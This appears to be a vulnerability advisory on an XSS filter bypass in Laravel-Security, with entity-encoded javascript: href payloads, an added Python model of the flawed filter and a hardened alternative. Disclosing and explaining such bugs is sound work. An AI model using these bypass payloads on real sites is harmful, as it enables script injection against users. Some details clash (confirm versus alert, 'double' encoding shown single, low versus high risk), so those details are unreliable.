Full title: Laravel-Security XSS Filter Bypass Vulnerability
Date added: 2014-05-01
Category: web applications
Platform: php
Risk: Security Risk Low
===================================
*#Product: Laravel-Security XSS Filter Bypass*
*#Vulnerability: Mutation Based XSS Bypass*
*#Impact: Medium/High*
*#Authors: Rafay Baloch*
*#Company: RHAinfoSEC*
*#Website: http://rhainfosec.com*
*#Status: Fixed*
*=========*
*Description*
*=========*
Laravel Security is a port of the security class from CodeIgniter 2.1 to
Laravel 4.1. It relies on a blacklist approach to filter out common
malicious inputs.
*=========*
*Vulnerability*
*==========*
The vulnerability lies in the fact that the XSS filter decoded HTML
entities. Because of this, it was possible to construct a payload that
bypassed the filtering mechanism and executed JavaScript.
*=============*
*Proof of concept*
*=============*
During the initial test the following input was provided:
<a href="javascript:confirm(1)">Clickhere</a>
The filter decodes the HTML entities, and hence the attack was blocked.
After decoding:
<a href="javascript:alert(1)">Clickhere</a>
Next, we double encoded the entities:
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
Since the filter decodes the entities only once, we are left with the
following:
<a href="javascript:confirm(1)">Clickhere</a>
This is perfectly valid syntax inside an href context and would execute
JavaScript.
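As an added illustration (not the project's code), the following Python models the decode-once-then-blacklist behaviour the advisory describes, runs the double-encoded payload from above through it, and shows a hardening that canonicalises the input before matching. The filter logic, the function names and the `max_rounds` limit are assumptions; the hardening is a general approach, not the fix the project itself shipped.

```python
import html
import re
from typing import Optional

# Blacklist in the spirit of the filter described above: reject a
# "javascript:" URI scheme found in the input.
JS_SCHEME = re.compile(r"javascript\s*:", re.IGNORECASE)

# Constructed sample modelled on the advisory's payload. ONCE is the
# entity-encoded "javascript:confirm(1)"; DOUBLE encodes each "&" again.
ONCE = ("&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58"
        "&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41")
DOUBLE = ONCE.replace("&", "&amp;")
PAYLOAD_ONCE = f'<a href="{ONCE}">Clickhere</a>'
PAYLOAD_DOUBLE = f'<a href="{DOUBLE}">Clickhere</a>'


def vulnerable_filter(markup: str) -> Optional[str]:
    """Assumed model of the flawed behaviour: decode entities exactly once,
    blacklist the result, and hand the decoded string on.
    Returns None when blocked."""
    decoded = html.unescape(markup)
    if JS_SCHEME.search(decoded):
        return None
    return decoded


def canonicalise(text: str, max_rounds: int = 8) -> str:
    """Decode entities until the text stops changing, so the blacklist sees
    what any number of later decoding steps would produce."""
    for _ in range(max_rounds):
        decoded = html.unescape(text)
        if decoded == text:
            return text
        text = decoded
    return text  # may still be decodable; hardened_filter checks for that


def hardened_filter(markup: str) -> Optional[str]:
    """Match the blacklist against the fully canonicalised form, but return
    the input untouched: the filter never decodes on the caller's behalf."""
    canonical = canonicalise(markup)
    if JS_SCHEME.search(canonical) or html.unescape(canonical) != canonical:
        return None
    return markup


def browser_sees(markup: str) -> str:
    """A browser decodes the attribute's entities once when parsing."""
    return html.unescape(markup)
```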
*===*
*Fix*
*===*
The vulnerability has been fixed; the latest version doesn't decode HTML
entities, and hence the attack is mitigated.
*==========*
*References*
*==========*
https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413